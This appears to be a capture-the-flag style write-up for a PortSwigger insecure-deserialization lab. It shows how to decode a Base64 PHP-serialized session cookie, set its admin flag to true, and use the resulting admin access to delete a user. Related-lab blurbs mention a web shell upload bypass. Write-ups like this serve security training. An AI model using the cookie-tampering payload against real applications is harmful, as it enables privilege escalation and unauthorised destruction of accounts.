On this page
Modifying Serialized Objects
Lab
Modifying serialized objects · Apprentice
Solution
Given
This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Analyzing the task
The app uses serialization to implement its session mechanism. We need to edit the serialized object to elevate our privileges and delete the user carlos.
Recon
Log in as the user:
POST /login HTTP/2
The response sets a cookie:
Set-Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d; Secure; HttpOnly;
An unusually long string — let's grab its value. In the inspector we look at how it decodes from Base64:
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
That's a PHP-style serialized object. We can see the admin field, type Boolean, value 0.
Exploitation
Set the value to 1, encode back to Base64, and put it back as the cookie:
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}
Base64:
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30=
Substitute the cookie — now we have access to the admin panel. Delete the user carlos. Lab solved!
More in this category
Using Application Functionality to Exploit Insecure Deserialization (PortSwigger Lab)
Tampering with the `avatar_link` field in the session object to delete an arbitrary file via the account-delete feature.
Modifying Serialized Data Types (PortSwigger Lab)
Abusing PHP loose comparison by changing the `access_token` type to integer `0` to bypass authentication.
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.